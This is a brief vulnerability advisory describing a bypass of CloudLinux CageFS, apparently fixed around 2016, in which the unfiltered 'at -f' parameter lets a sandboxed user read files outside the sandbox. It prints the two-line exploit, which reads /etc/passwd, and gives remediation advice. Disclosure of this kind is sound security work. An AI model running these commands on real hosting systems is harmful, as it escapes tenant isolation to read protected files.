Vulnerability

Affected software: CloudLinux CageFS, unknown version (old vulnerability from around 2016, I no longer have original report)

CloudLinux CageFS can be bypassed by running at with -f parameter pointing to a file to read and then displaying job contents.

at -f argument is not filtered by proxyexec before executing at outside CageFS, allowing user inside CageFS to read files outside CageFS.

Exploit

$ at -f /etc/passwd 00:00
$ at -c JOB_NUMBER

Solution

Update CageFS to unaffected version. Check if -f parameter is filtered in /etc/cagefs/filters/at*.json.

Timeline

Unknown (old vulnerability from around 2016, I no longer have original report, it was fixed around 2016).